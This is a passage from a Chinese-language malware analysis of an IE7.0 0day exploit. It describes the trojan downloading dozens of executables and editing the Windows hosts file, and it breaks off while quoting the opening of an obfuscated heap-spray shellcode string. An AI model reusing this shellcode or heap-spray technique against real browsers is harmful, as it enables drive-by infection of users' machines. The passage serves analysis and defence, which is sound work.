攻防实战：深入剖析最新IE7.0 0day漏洞利用代码

核心提示： （4）木马下载文件在临时文件夹中发现下载了34个可执行文件，如图8所示，攻防实战：深入剖析最新IE7.0 0day漏洞利用代码(5)，文件从几K到几十K大小不等，估计应该是针对不同杀毒软件的病毒程序，但也可以改变，通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行

（4）木马下载文件

在临时文件夹中发现下载了34个可执行文件，如图8所示，文件从几K到几十K大小不等，估计应该是针对不同杀毒软件的病毒程序。

图8 下载文件分析

（5）修改host文件，屏蔽国内安全站点

下载文件后，木马然后修改了C:WINDOWSsystem32driversetc下的host文件，如图9所示。

图9 修改host文件

呵呵，说实话，我一开始也没弄明白，这个代码要屏蔽这些网站的目的是什么，后面听一个朋友的话才知道，其中的一些网站是我们国内的一些黑客组织网站；）这难道就是所谓的恶意竞争？

说明：

Hosts文件是一个用于存储计算机网络中节点信息的文件，它可以将主机名映射到相应的IP地址，实现DNS的功能，它可以由计算机的用户进行控制。Windows NT/2000/XP/2003/Vista默认位置%SystemRoot%system32driversetc，但也可以改变。

通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行的操作。

分析和研究该代码

1.分析漏洞代码

代码应该说还是比较简单的，关键的Shellcode应该就是这一大段乱码了

spray
(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dad